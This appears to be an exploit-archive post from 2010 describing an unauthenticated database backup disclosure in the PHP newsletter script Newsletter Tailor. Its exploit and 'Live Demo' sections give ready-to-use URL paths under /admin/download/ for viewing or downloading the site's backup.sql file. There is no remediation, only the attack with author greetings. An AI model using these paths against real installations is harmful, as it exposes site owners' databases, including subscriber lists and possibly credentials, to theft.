[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Newsletter Tailor Database Backup Dump Vulnerability
# Published : 2010-02-09
# Author : ViRuSMaN
# Previous Title : CPA Site Solutions Remote File Upload Vulnerability
# Next Title : Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability


==============================================================================
[?] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[?] Newsletter Tailor Database Backup Dump Vulnerability
==============================================================================

[?] Script: [ Newsletter Tailor ]
[?] Language: [ PHP ]
[?] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[?] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[?] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[?] http://[target].com/[path]/admin/download/backup.sql <-=- You Can See The backup Code From Here
[?] http://[target].com/[path]/admin/download/download.php?file=backup.sql <-=- You Can Download backup From Here

===[ Live Demo ]===

[?] http://[target].com/[path]/admin/download/backup.sql
[?] http://[target].com/[path]/admin/download/download.php?file=backup.sql

Author: ViRuSMaN <-

###########################################################################